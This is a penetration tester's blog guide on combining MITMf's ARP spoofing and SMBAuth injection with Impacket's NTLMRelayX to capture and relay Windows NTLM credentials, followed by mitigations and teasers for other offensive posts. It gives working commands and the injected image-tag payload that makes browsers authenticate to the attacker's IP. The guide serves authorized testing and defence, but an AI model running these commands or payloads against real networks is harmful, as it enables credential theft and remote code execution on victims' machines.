NTLMRelayX and MITMf

-

Introduction:

Recently I have been playing around with the Man-In-The-Middle Framework (MITMf) and have found it to be the most successful tool for me to use on internal penetration tests and significantly more reliable than similar spoofing tools such as Ettercap. MITMf is a modularized framework written in Python which is capable of both establishing MITM attacks and utilizing them in very productive ways. The built-in modules make performing complicated MITM attacks extremely simple with things such as SMBAuth, BeEF injection, MSF’s BrowserSniper, BDFProxy, NetCreds, Responder, etc. Outside of just this combination, I highly recommend over any other MITM tool. Learn it, use it, live it.

There are a lot of people who use tools such as Responder to trick systems into sending NTLM credentials then relaying them with SMBRelayX (if you aren’t already doing this on internals, get on it). Although highly successful, it is quickly becoming more and more difficult to pull off as a pentester. If you were not aware, Microsoft basically killed off the success of Responder with MS16-077 by disabling NetBIOS-NS by default. This allowed us to impersonate systems to other systems on our local subnet and capture NTLM hashes. In situations where the client has not applied this patch (or re-enabled the hardened settings) and these users have administrative rights, you could get lucky and choose to try to relay those credentials to a system where the connecting user is an administrator, but in my experience that is rare and is more successful in the environments which have 10 other ways in. My goal was to rely on similar methods but reduce or eliminate the luck required to pull of this type of attack.

The first step in eliminating the luck is to become less reliant on Responder and the way that it works. This tool requires systems to be broadcasting and looking for certain systems via NetBIOS-NS or LLMNR. If the client has patched MS16-077, this is unlikely to happen for you. Another way to force users to connect to you and send NTLM hashes is with crafty thinking, terrible programming on Microsoft’s end, and the wonderful MITMf tool. I will discuss in detail how the module works later in this guide but there is a module called SMBAuth which injects HTML tags into cleartext HTTP traffic (or successfully MITM’d SSL/TLS traffic) which can cause Internet Explorer or Microsoft Edge browsers to establish SMB connections to your system. They will automatically send you the authentication information of the current user! New way to get those hashes.

The second step in eliminating luck is not relying on successfully cracking password hashes. SMBRelayX is a great tool for this as it can take the hash received, and relay it to a system on the network of your choosing to attempt to authenticate as that user. The key here is it will relay it to a system. If the user is not an administrator of that specified system, you will not be able to execute code and you will be very limited if you can do anything at all.

My suggested approach to avoid having to crack passwords and not being restricted to guessing which systems a user might be admin on, is to use an Impacket module which is very similar to SMBRelayX but supports relaying in a round-robin format to multiple hosts, NTLMRelayX. This tool will accept a list of hosts as an input and with each connection, it will attempt to relay credentials to the next host in the provided list. If we point it to every accessible Windows host in the environment and MITM long enough, we will execute code on any machine that the user has local administrative access on*.

The rest of this guide will provide details on setting up, executing, and understanding these tools as well as some insight into some of the mitigations which clients can implement to help prevent these attacks.

Notes to the reader: There are two things that I cannot stress enough, how powerful and important MITM attacks are, and how dangerous MITM attacks are if executed improperly. I encourage anyone reading this that wishes to execute this in a client environment to do so, but only after you have tested the tools in a practice environment, are very comfortable with how the tools work, and have enough of an understanding to troubleshoot the tools and quickly recognize issues. We are all prone to mistakes and even I have caused significant outages doing attacks such as ARP spoofing, but the more you know about how a tool works and the more care you take with the tools you are using, the less likely you are to bring down the networks that you are testing against. Always check your targets! Do not MITM large sets of hosts. Use focused attacks and take the time to review traffic. Understand who you are targeting in an MITM attack before executing. Use common sense. It has been a long time since I have caused any significant issues with MITM attacks and 75-90% of my clients never notice the attack. If executed right, it is a powerful and stealthy attack in most environments. Also, my last note is more of a pro tip: always run Wireshark (or similar packet capturing tool) when doing MITM attacks. This allows you to go back and look at the information that you captured in the MITM attack. Sometimes this is extremely relevant and if you don’t capture it, it may be gone forever.


*Sure there is some luck as the user might not have local admin anywhere but I am just going to ignore that because 99% of the time, they are local admins somewhere. Also, if the system is properly patched and they are a local admin on their own system, Microsoft has prevented relaying to the same host initiating the connection, so you won’t be able to pop their own workstation.


Requirements:

Pulling off this attack requires two tools which are either installed by default on Kali or available via an apt-get but both sadly do not work directly out of the box. I have provided a few details in this section which will help you get started with these tools. Additional details can be obtained by reaching out to me.

MITMf:

I recommend downloading this tool to the /opt/ folder on your testing system and following the install instructions they provide. A simple apt-get install on Kali does not work. The setup instructions include creating a virtual environment for Python because there are some dependencies on older Python libraries. Replacing these libraries with the older version for the default Python environment may break other tools on your system. One note that they do not include is how to get back to leave a virtual environment or how to get back into one. The github for this project can be found at https://github.com/byt3bl33d3r/MITMf with the installation instructions at https://github.com/byt3bl33d3r/MITMf/wiki/Installation.

Entering an already created virtual environment:
To enter an already created virtual environment, you would use the “workon” command. For example, with MITMf, you would type on the command line:

#workon MITMf

Exiting a virtual environment:
To exit the current virtual environment, you can type ”deactivate” and it will bring you back to a standard shell which will use your system’s default Python environment.

NTLMRelayX:

By default, this tool is installed on Kali in /usr/share/doc/python-impacket/examples/ntlmrelayx.py, but sadly is missing required dependencies, some of them are older Python libraries. I have not found any guides on getting this setup, so I will detail some steps here.
This tool is dependent on the ldap3 version 1.4.0 library which is not the current version, nor the current version installed on Kali by default. To prevent breaking other tools in Kali which rely on newer version of this library, I recommend setting up another virtual environment to use this tool in. To do this (assuming you went through the steps to setup MITMf and have virtual environments properly setup for that tool), we must first create the virtual environment:

#mkvirtualenv ntlmrelayx –p /usr/bin/python2.7

Once inside a new virtual environment, we have little to no Python libraries installed. At the time of this writing, I had to install the following libraries:

  • impacket
  • pycrypto
  • pyopenssl
  • ldap3==1.4.0
  • ldapdomaindump


I installed each of these using the following command:

#pip install [library name]

The last trip-up I had with this tool is that it is not written to be able be run in a virtual environment and takes some small tweaking to actually work here**. We need to change the shebang line from “#!/usr/bin/python” to “#!/usr/bin/env python2.7” to get it to work properly in the virtual environment that was just created. I recommend creating a backup of the original before making an modifications. Once this is done, the tool should function as intended without causing issues to other tools on your system. Keep in mind that each time you go to use this tool, you will have to make sure to enter your virtual environment and run it from within this environment.

** Huge thanks to Andy Bard for teaching me something new about Python and the difference between #!/usr/bin/python and #!/usr/bin/env python2.7 and helping me to get this tool to work in a virtual environment! I would still be breaking things on my system without this knowledge.


MITMf and SMBAuth:

Once we have all of the tools setup on our system we can start the actual attack. The first part of the attack requires us to establish a MITM connection between one or more targets and their gateway so that we can observe and manipulate their traffic. The most successful method I have found with this is to use ARP spoofing against 1-5 workstations on your local subnet. I am not going to dive into the risks of ARP spoofing or techniques for selecting targets here, but I will state that you should be careful of what/who you MITM and how many systems you MITM at a time.

The first step with any tool should almost always be the help command. First switch to the directory in which you installed MITMf (probably /opt/MITMf/) then run “./mitmf --help” to see the available switches and how to use them. With MITMf, we let the tool know that we want to do ARP spoofing with the “--spoof --arp” arguments. If we don’t want to use gratuitous ARP, we can use “--spoof --arp --arpmode rpy” if we only want to reply to ARP requests rather than initiating them ourselves. This method can be slightly more stealthy but usually less efficient.

While we are in a position to observe and control traffic, we can tell MITMf to automatically identify plaintext HTTP traffic and automatically inject HTML code into any identified traffic. In some situations this can be JavaScript to steal cookies or hook BeEF, but in our situation we want to force the user’s browser to authenticate to use using SMB so we will use the “--SMBAuth” switch.

In total, we would run the following command from our MITMf virtual environment:

#./mitmf --spoof --arp --SMBAuth -i [interface] --gateway [gateway IP address] --targets [list of target hosts, comma separated, accepts things such as 192.168.0.1-15]


Executing MITMf in a lab environment against a single target Windows 7 workstation with IP of 10.2.2.2


MITMf automatically injecting SMBAuth HTML payload into cleartext HTTP traffic

This switch will exploit functionality built into Internet Explorer and Microsoft Edge to render images on a file share. We trick the browser into thinking that there are images available on a file share and tell it that the file share is located at our IP address. Without any other tools, this will detect the SMB connection and capture the NTLM hashes. For the purposes of this guide, we don’t care to capture the hashes, we would rather relay them to our targets. For more details on this, skip down to the NTLMRelayX section of this guide. For more details on how the SMBAuth works, see below.


Workings of SMBAuth:

The SMBAuth module built into MITMf works by observing network traffic and looking for cleartext HTTP traffic, specifically the “</body> tag. If it finds this tag, it will replace it with multiple image tags followed by the original close body tag. Below is a simple example of a server responding with HTML code and the HTML code that would be injected for an attacker machine with the IP address of 192.168.0.101. Injected code is bolded.

<html>
<head>
<title> Hello World </title>
</head>
<body>
Hello World
<img src=”\\192.168.0.101\image.jpg”><img src=”file:////192.168.0.101\image.jpg”><img src=”moz-icon:file://%5c/192.168.0.101\image.jpg”/></img></img></body>
</html>


Using view-source to look at the returned HTML code when hit by an MITM attack using Internet Explorer on Windows 7

These various image tags tell Internet Explorer and Microsoft Edge to make an SMB connection and provide NTLM credentials to the target host to download the image.jpg file. For an attacker, this is wonderful, an end user, terrible. As an attacker, we are able to leverage the NTLMRelayX tool detailed below to relay the authentication information received to multiple systems on the network and execute secretsdump.py on any system on which the MITM’d user has administrative credentials and does not have SMB signing enabled.

NOTE: Although I put these two tool execution descriptions in this order, they must actually be run in reverse to work properly. You must first execute NTLMRelayX in one shell, then kick off the MITM attack using MITMf next. MITMf will start an SMB server by default (even with no modules loaded, check out the main function yourself) so running this will lock up TCP port 445 and NTLMRelayX will not be able to start. MITMf will still run properly (for the purpose of this attack) if it cannot bind to that port because NTLMRelayX is already running.

NTLMRelayX:

For those of you who are familiar with SMBRelayX, NTMLRelayX should not look or feel much different at all once you have the dependencies taken care of. This tool will listen for NTLM connections and relay them to a list of specified hosts. We use the “-tf [host list]” to define a file containing a list of hosts to target. We can optionally set the “-w” flag which, if enabled, will check the file provided in the –tf argument for updates and add new targets as the file changes. In cases where you are doing testing or you have not enumerated all accessible Windows systems, this can be a useful switch.


Creating a target list with one IP per line to use with the ‘-tf’ switch


Running NTLMRelayX with the –tf and –w switches

There are definitely other options which we can specify and are relevant on most penetration tests such as “-c” to execute commands, including empire payloads, or “-e” to upload and execute files such as a custom MSFPayload. In the event that we did not define either of these items, this tool with automatically attempt to execute SecretsDump.py against the target host.


 Successful authentication and execution of SecretsDump.py.

In many cases, this will be enough to get you started on the post exploitation phase of the penetration test, but in situations, where there are additional protections in place preventing this from being extremely useful, I recommend using the “-e” or “-c” switches.

There are certain situations in which this attack will be stopped. As mentioned in the introduction, Microsoft released a patch which stops users from relaying hashes back to the original host. If the user is only a local admin on their own host, this will not be too useful. The other situation is when SMB signing is enabled. This is the case by default on domain controllers and can be the case on other servers or workstations in the environment.


Relaying credentials to a domain controller with SMB signing enabled and failing.

Mitigations:

As mentioned above, one mitigation to prevent the relay portion of this attack would be to enable SMB signing throughout the environment. I have heard various estimates for the overhead on network level traffic caused by this and if there is any concern about capping out bandwidth, clients should take a risk based approach to determine which systems should have SMB signing enabled.

SMB signing will only prevent the ability to relay credentials successfully and will not provide any protections around capturing password hashes. In the event that SMB signing is enabled, we would still be able to use the MITMf section of this guide to capture credentials and attempt to wordlist/hybrid attack the hash and hopefully recover the plaintext password of the hash. In this situation, I would recommend using a different browser other than Internet Explorer or Microsoft Edge. Both Chrome and Firefox can be configured to automatically send NTLM credentials to authenticate to an SMB server, but neither will do it by default. Per the research I have done, there is no way to disable this feature in IE or Edge, only for the entire Windows system (which breaks basically everything…).

There are other solutions to prevent ARP spoofing but, to me, this is more of a solution of a symptom than a root cause because attackers on the internal network can use other MITM attacker to attack clients and stopping ARP spoofing is no guaranteed protection against the damages of MITM attacks.



Comments

Post a Comment

Popular posts from this blog

No Shells Required - a Walkthrough on Using Impacket and Kerberos to Delegate Your Way to DA

-
There are a ton of great resources that have been released in the past few years on a multitude of Kerberos delegation abuse avenues.   However, most of the guidance out there is pretty in-depth and/or focuses on the usage of @Harmj0y’s Rubeus.   While Rubeus is a super well-written tool that can do quite a few things extremely well, in engagements where I’m already running off of a primarily Linux environment, having tools that function on that platform can be beneficial.   To that end, all the functionality we need to perform unconstrained, constrained, and resource-based constrained delegation attacks is already available to us in the impacket suite of tools. This post will cover how to identify potential delegation attack paths, when you would want to use them, and give detailed  walkthroughs  of how to perform them on a Linux platform.   What we won’t be covering in this guide is a detailed background of Kerberos authentication, or how various types of delegation work in-depth
Read more

Executing Macros From a DOCX With Remote Template Injection

-
The What: In this post, I want to talk about and show off a code execution method which was shown to me a little while back. This method allows one to create a DOCX document which will load up and allow a user to execute macros using a remote DOTM template file. This attack has been seen in the wild, is partially included in open-source offensive security tools , as has been blogged about by Cisco Talos , but in the blog post and the open-source tool, it is only seen as a credential stealing attack typically over the SMB protocol. This blog post will detail how to use this method to download a macro-enabled template over HTTP(S) in a proxy-aware method into a DOCX document. The Why: The benefit of this attack versus a traditional macro enabled document is multidimensional. When executing a phishing attack against a target, you able to attach the .docx directly to the email and you are very unlikely to get blocked based on the file extension. Many organizations block .doc or .do
Read more

One Click to Compromise -- Fun With ClickOnce Deployment Manifests

-
Note: I submitted a report to MSRC regarding the hash-disclosure vulnerability associated with ClickOnce deployment manifests. After review I got a response back earlier in July where it was noted that the vulnerability did not meet the bar for immediate servicing and was given the green light to disclose. Edit 9/22:  MS has remediated the NTLM-disclosure part of this issue as of KB4576630 https://support.microsoft.com/en-us/help/4576630/kb4576630   However, this method will still work as a delivery mechanism for stage-0 payloads. TL;DR ClickOnce Deployment Manifests are a relatively unknown way to both get an initial payload into an environment as well as remotely retrieve NTLM challenge-response hashes over HTTP.  Hash retrieval occurs on initial file open (before any warnings pop) meaning that even if the user opts to close out on the warning, we still have a hash we can attempt to crack.   IE also has some interesting interactions with these files and will automatically execute
Read more